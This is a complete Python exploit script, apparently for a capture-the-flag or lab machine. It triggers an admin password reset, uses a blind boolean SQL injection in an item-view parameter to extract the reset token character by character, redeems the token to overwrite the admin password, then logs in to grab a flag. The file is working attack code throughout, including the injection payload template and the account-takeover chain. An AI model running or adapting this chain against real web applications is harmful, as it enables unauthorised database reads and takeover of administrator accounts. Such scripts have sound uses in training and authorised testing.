#!/usr/bin/env python3
import random
import re
import secrets
import string
import sys

import requests
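def viewItem(s, target, query, proxies=None, timeout=30):
    """Boolean SQL-injection oracle on ``/item/viewItem.php``.

    Appends ``query`` verbatim (no URL encoding; callers write spaces as
    ``+``) to the ``id`` parameter as ``5+or+<query>`` and reports whether
    the server answered 404. The script's ``1=1`` sanity check expects True,
    so a 404 is taken to mean "the injected condition holds".

    Args:
        s: requests session used for the GET.
        target: host[:port] of the target, inserted into the URL as-is.
        query: raw SQL boolean expression; it is never escaped.
        proxies: requests proxy mapping. Defaults to
            ``http://localhost:8080``; something must be listening there
            (an interception proxy) or the request raises.
        timeout: seconds before the request is abandoned with
            ``requests.exceptions.Timeout`` instead of hanging forever.

    Returns:
        True when the response status is 404, False otherwise.
    """
    if proxies is None:
        proxies = {"http": "http://localhost:8080"}
    url = "http://%s/item/viewItem.php?id=5+or+%s" % (target, query)
    r = s.get(url, proxies=proxies, timeout=timeout)
    return r.status_code == 404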
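def ask_reset_password(s, target, username, proxies=None, timeout=30):
    """Submit a password-reset request for ``username``.

    POSTs ``username`` to ``/login/resetPassword.php`` and looks for the
    application's confirmation sentence in the response body.

    Args:
        s: requests session used for the POST.
        target: host[:port] of the target, inserted into the URL as-is.
        username: account whose reset token should be generated.
        proxies: requests proxy mapping; defaults to ``http://localhost:8080``.
        timeout: seconds before the request is abandoned with
            ``requests.exceptions.Timeout`` instead of hanging forever.

    Returns:
        True if the confirmation message appears in the response body,
        False otherwise.
    """
    if proxies is None:
        proxies = {"http": "http://localhost:8080"}
    url = "http://%s/login/resetPassword.php" % target
    data = {"username": username}
    response = s.post(url, data=data, proxies=proxies, timeout=timeout)
    ok_message = "Password Reset Link has been sent to you via Email, please check it out."
    return ok_message in response.text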
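def change_admin_password(s, target, token, new_password, proxies=None, timeout=30):
    """Redeem a password-reset ``token`` to set ``new_password``.

    POSTs ``token`` and ``password`` to ``/login/doChangePassword.php``.
    The token is sent over plain HTTP, exactly as the rest of this script
    does; the target is a lab host.

    Args:
        s: requests session used for the POST.
        target: host[:port] of the target, inserted into the URL as-is.
        token: reset token previously recovered for the account.
        new_password: password to set.
        proxies: requests proxy mapping; defaults to ``http://localhost:8080``.
        timeout: seconds before the request is abandoned with
            ``requests.exceptions.Timeout`` instead of hanging forever.

    Returns:
        True if ``Success!`` appears in the response body, False otherwise.
    """
    if proxies is None:
        proxies = {"http": "http://localhost:8080"}
    url = "http://%s/login/doChangePassword.php" % target
    data = {"token": token, "password": new_password}
    response = s.post(url, data=data, proxies=proxies, timeout=timeout)
    return "Success!" in response.text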
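# Flag marker scraped from the post-login page; group 1 is the hex payload.
_FLAG1_RE = re.compile(r"FLAG1: ([\da-f]*)")


def get_first_flag(s, target, new_password, username="admin", proxies=None, timeout=30):
    """Log in as ``username`` and scrape the first flag from the response.

    POSTs the credentials to ``/login/checkLogin.php``; on a body containing
    ``Success!`` returns the hex digits following the first ``FLAG1: ``
    marker.

    Args:
        s: requests session used for the POST.
        target: host[:port] of the target, inserted into the URL as-is.
        new_password: password to log in with.
        username: account to log in as (``admin`` by default).
        proxies: requests proxy mapping; defaults to ``http://localhost:8080``.
        timeout: seconds before the request is abandoned with
            ``requests.exceptions.Timeout`` instead of hanging forever.

    Returns:
        The flag's hex digits, or "" when the login did not report
        ``Success!`` or no ``FLAG1: `` marker is present (the previous
        ``findall(...)[0]`` raised IndexError in the latter case).
    """
    if proxies is None:
        proxies = {"http": "http://localhost:8080"}
    url = "http://%s/login/checkLogin.php" % target
    data = {"username": username, "password": new_password}
    response = s.post(url, data=data, proxies=proxies, timeout=timeout)
    if "Success!" not in response.text:
        return ""
    match = _FLAG1_RE.search(response.text)
    return match.group(1) if match else ""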
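# Lab target for every request; previously repeated inline in each call.
TARGET = "192.168.122.219"
# Highest 1-based token position probed (the original loop ran 1..49); the
# loop stops earlier as soon as a position yields no character.
MAX_TOKEN_LEN = 49
# Printable-ASCII bounds the per-character binary search works within.
ASCII_LOW = 32
ASCII_HIGH = 126
# Boolean condition on one character of the id=1 (admin) user's reset token:
# "ascii(token[pos]) <op> value", formatted with (pos, op, value). Spaces are
# written as "+" because viewItem() injects the text into a URL unencoded.
TOKEN_QUERY = "(select+ascii(substr((select+token+from+user+where+id=1),%d,1)))%s%d"


def _recover_token_char(s, target, position):
    """Binary-search one token character through the ``viewItem`` oracle.

    Probes ``>`` and ``<`` on the candidate value. When neither holds, the
    original code assumed equality; here an explicit ``=`` probe confirms it,
    so an oracle that has stopped answering (both comparisons False) is not
    mistaken for a match and turned into a fabricated character.

    Returns:
        The character at 1-based ``position``, or None when no candidate in
        ``ASCII_LOW..ASCII_HIGH`` matches, which is how the end of the token
        (or a broken oracle) is detected.
    """
    low, high = ASCII_LOW, ASCII_HIGH
    while low <= high:
        middle = (low + high) // 2
        if viewItem(s, target, TOKEN_QUERY % (position, ">", middle)):
            low = middle + 1
        elif viewItem(s, target, TOKEN_QUERY % (position, "<", middle)):
            high = middle - 1
        elif viewItem(s, target, TOKEN_QUERY % (position, "=", middle)):
            return chr(middle)
        else:
            # Neither >, < nor = held: do not guess, let the caller stop.
            return None
    return None


def _require(ok, exit_code):
    """Print the step outcome and abort with ``exit_code`` when ``ok`` is False."""
    if ok:
        print(" success!", flush=True)
    else:
        print(" failure!", flush=True)
        sys.exit(exit_code)


def main():
    """Run the exploit chain: reset request -> blind SQLi token exfil -> takeover."""
    s = requests.session()

    # STEP 1. Request a password reset for admin so a token exists to steal.
    print("[*] Sending password reset request... ", end="", flush=True)
    _require(ask_reset_password(s, TARGET, "admin"), -1)

    # STEP 2. Confirm the boolean oracle works before hammering it.
    print("[*] check if the target is exploitable... ", end="", flush=True)
    _require(viewItem(s, TARGET, "1=1"), -1)

    # STEP 3. Recover the token one character at a time.
    print("[*] exfiltrating token.... ", end="", flush=True)
    chars = []
    for position in range(1, MAX_TOKEN_LEN + 1):
        ch = _recover_token_char(s, TARGET, position)
        if ch is None:
            break
        chars.append(ch)
    token_found = "".join(chars)
    print(token_found, flush=True)
    if not token_found:
        # The original went on to submit an empty token; stop here instead.
        print("[-] no token recovered, aborting", flush=True)
        sys.exit(-1)

    # STEP 4. Destructive: this overwrites the admin password. The new value
    # is printed so the operator can record it for the report / restoration.
    # secrets (not random) so the credential we plant is not predictable.
    new_password = "".join(secrets.choice(string.ascii_lowercase) for _ in range(10))
    print("[*] changing admin password with '%s'" % new_password, end="", flush=True)
    _require(change_admin_password(s, TARGET, token_found, new_password), -2)

    # STEP 5. Log in with the planted credential and grab the flag.
    print("[*] login and get first flag...", end="", flush=True)
    flag = get_first_flag(s, TARGET, new_password)
    if not flag:
        print(" failure!", flush=True)
        sys.exit(-3)
    print(flag, flush=True)


if __name__ == "__main__":
    main()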